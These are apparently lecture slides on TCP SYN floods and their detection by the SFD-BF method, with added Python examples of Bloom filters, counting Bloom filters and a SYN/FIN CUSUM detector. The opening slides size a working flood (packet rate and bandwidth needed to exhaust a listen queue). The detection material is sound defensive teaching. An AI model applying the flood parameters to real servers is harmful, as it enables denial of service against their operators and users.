[Figure: client C sends SYN1, SYN2, …, SYN5 to server S, which is listening and stores state for each half-open connection]
Implementation Method
How to create a successful flood
◼ Forcing drops of incomplete connections (ICs)
❑ Standard TCP: a connection times out only after several retransmissions ➔ 511 sec
❑ Assuming 1024 ICs are allowed per socket ➔ about 2 connection attempts per second exhaust all allocated resources.
❑ Note that existing ICs are dropped when a new SYN request is received while the queue is full.
◼ If an ACK arrives at the server but does not find a corresponding IC state ➔ the server fails to establish the required connection
❑ Round trip time (RTT): time required for the server to receive the client's reply
❑ Forcing the server to drop IC state at a rate faster than the RTT ➔ no connections are able to complete ➔ the attack succeeds!
◼ The goal of the attack is to recycle every connection before the average RTT
❑ For a listen queue size of 1024 and a 100 millisecond RTT ➔ need about 10,000 packets per second.
❑ A minimal-size TCP packet is 64 bytes, so the total bandwidth used is only about 5 Mb/second (10,000 × 64 bytes × 8 bits) ➔ practical!
[Figure: packet counts over time; red = SYN, blue = FIN, black = RST]
Statistical Attack Detection
during an attack
False Positive Possibilities
◼ Present the algorithm with an illustrative example with q = 23.
SFD-BF
Idea
• Input: x
• Output: H[x]
• Properties
– Each value of x maps to a value of H[x]
– Typically: Size of (x) >> Size of (H[x])
• Implementation
– Hash Function: XOR of bits, shifting, rotates, ...
Operating System Concepts
Bloom-Filter (BF)
Querying a Bloom Filter
Optimal Parameters of a Bloom filter
Counting Bloom Filters
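The four Bloom-filter slides above as an added example (not code from the original slides): a plain Bloom filter, the optimal-parameter formulas m = –n·ln p / (ln 2)^2 and k = (m/n)·ln 2, and a counting Bloom filter whose entries can be removed again, which is what lets SYN flows be cleared on FIN. The double-hashing scheme (two 64-bit words of SHA-256) and the flow-key strings are this example's choices.

```python
"""Bloom filter and counting Bloom filter with the standard parameter formulas,
for the SYN/FIN bookkeeping the SFD-BF method needs. Added example; the
double-hashing scheme (two 64-bit words of SHA-256) is this example's choice."""
import hashlib
import math
from typing import List


def bloom_indexes(item: str, m: int, k: int) -> List[int]:
    """k bit positions via double hashing: h_i = (h1 + i*h2) mod m."""
    d = hashlib.sha256(item.encode()).digest()
    h1 = int.from_bytes(d[:8], "big")
    h2 = int.from_bytes(d[8:16], "big") | 1   # odd, so the probe sequence spreads
    return [(h1 + i * h2) % m for i in range(k)]


def optimal_parameters(n: int, p: float):
    """m bits and k hashes minimising size for n items at false-positive rate p."""
    m = math.ceil(-n * math.log(p) / (math.log(2) ** 2))
    k = max(1, round(m / n * math.log(2)))
    return m, k


def expected_fp_rate(m: int, k: int, n: int) -> float:
    return (1 - math.exp(-k * n / m)) ** k


class BloomFilter:
    """Set membership with no false negatives and a tunable false-positive rate."""

    def __init__(self, m: int, k: int):
        self.m, self.k = m, k
        self.bits = bytearray(m)             # one byte per bit, for readability

    def add(self, item: str) -> None:
        for i in bloom_indexes(item, self.m, self.k):
            self.bits[i] = 1

    def __contains__(self, item: str) -> bool:
        return all(self.bits[i] for i in bloom_indexes(item, self.m, self.k))


class CountingBloomFilter:
    """Counters instead of bits, so items can be removed (e.g. a flow on FIN)."""

    def __init__(self, m: int, k: int):
        self.m, self.k = m, k
        self.counts = [0] * m

    def add(self, item: str) -> None:
        for i in bloom_indexes(item, self.m, self.k):
            self.counts[i] += 1

    def __contains__(self, item: str) -> bool:
        return all(self.counts[i] > 0 for i in bloom_indexes(item, self.m, self.k))

    def remove(self, item: str) -> bool:
        """Decrement only if the item tests present; removing an absent item would
        corrupt other entries' counters."""
        if item not in self:
            return False
        for i in bloom_indexes(item, self.m, self.k):
            self.counts[i] -= 1
        return True


def false_positive_count(bf: BloomFilter, probes: List[str]) -> int:
    """Probes must be items never added; every hit is a false positive."""
    return sum(1 for p in probes if p in bf)
```

A counting filter still gives false positives, so a FIN for a flow that was never seen can decrement counters shared with real flows; the `remove` guard limits, but does not eliminate, that effect.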
SFD-Method
1- Classification of packets
2- Computing the # of SYN and FIN packets going through
3- Using the CUSUM algorithm to analyze the (SYN, FIN) pair behaviour
SFD-BF Method
Method
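The three steps of the SFD method above as an added example (not code from the original slides): packets are classified per interval into SYNs and FINs, the difference is normalised by a smoothed FIN rate, and a non-parametric CUSUM accumulates the excess so that a flood of SYNs without matching FINs drives the statistic over a threshold. The traffic series, the sample packets and the parameters a, h and the smoothing factor are this example's constructions, not the page's.

```python
"""The SFD method above as running code: classify packets per interval, count
SYNs and FINs, normalise (SYN - FIN) by a smoothed FIN rate and feed it to a
non-parametric CUSUM. Added example; the traffic series is constructed and the
parameters a, h and the smoothing factor are this example's choices, not the page's."""
from typing import Dict, List, Tuple

# (interval index, TCP flags) for a few constructed packets; "S" = SYN, "SA" = SYN-ACK,
# "FA" = FIN-ACK, "R" = RST.
SAMPLE_PACKETS = [(0, "S"), (0, "SA"), (0, "A"), (0, "FA"), (0, "FA"),
                  (1, "S"), (1, "S"), (1, "S"), (1, "SA"), (1, "FA"), (1, "R")]


def count_syn_fin(packets) -> Dict[int, Tuple[int, int]]:
    """Steps 1-2: per interval, count pure SYNs (not SYN-ACK) and FINs."""
    counts: Dict[int, List[int]] = {}
    for interval, flags in packets:
        c = counts.setdefault(interval, [0, 0])
        if "S" in flags and "A" not in flags:
            c[0] += 1
        if "F" in flags:
            c[1] += 1
    return {k: (v[0], v[1]) for k, v in counts.items()}


def syn_fin_cusum(syn, fin, a=0.5, h=3.0, beta=0.8):
    """Step 3: x_n = (SYN_n - FIN_n) / FIN_avg, y_n = max(0, y_{n-1} + x_n - a);
    alarm when y_n > h. a is set above the normal mean of x_n so y_n stays near 0
    on clean traffic; h trades detection delay against false alarms."""
    y, fin_avg, out = 0.0, None, []
    for s, f in zip(syn, fin):
        fin_avg = float(f) if fin_avg is None else beta * fin_avg + (1 - beta) * f
        x = (s - f) / max(fin_avg, 1.0)
        y = max(0.0, y + x - a)
        out.append((round(x, 3), round(y, 3), y > h))
    return out


def first_alarm(results):
    """Index of the first interval that raised an alarm, or None."""
    return next((n for n, (_, _, alarm) in enumerate(results) if alarm), None)


# Constructed per-interval (SYN, FIN) counts: ten quiet intervals, then a flood.
NORMAL = [(100, 98), (104, 101), (97, 99), (110, 105), (99, 100),
          (103, 102), (101, 99), (98, 97), (105, 104), (100, 101)]
FLOOD = [(600, 100), (900, 102), (1200, 99), (1500, 101)]
SYN = [s for s, _ in NORMAL + FLOOD]
FIN = [f for _, f in NORMAL + FLOOD]
```

The SYN/FIN pairing is what makes the test stateless and cheap, but it also means a flood of SYNs paired with forged FINs, or a server that simply RSTs connections, needs RST counted too (the figure legend above tracks SYN, FIN and RST together).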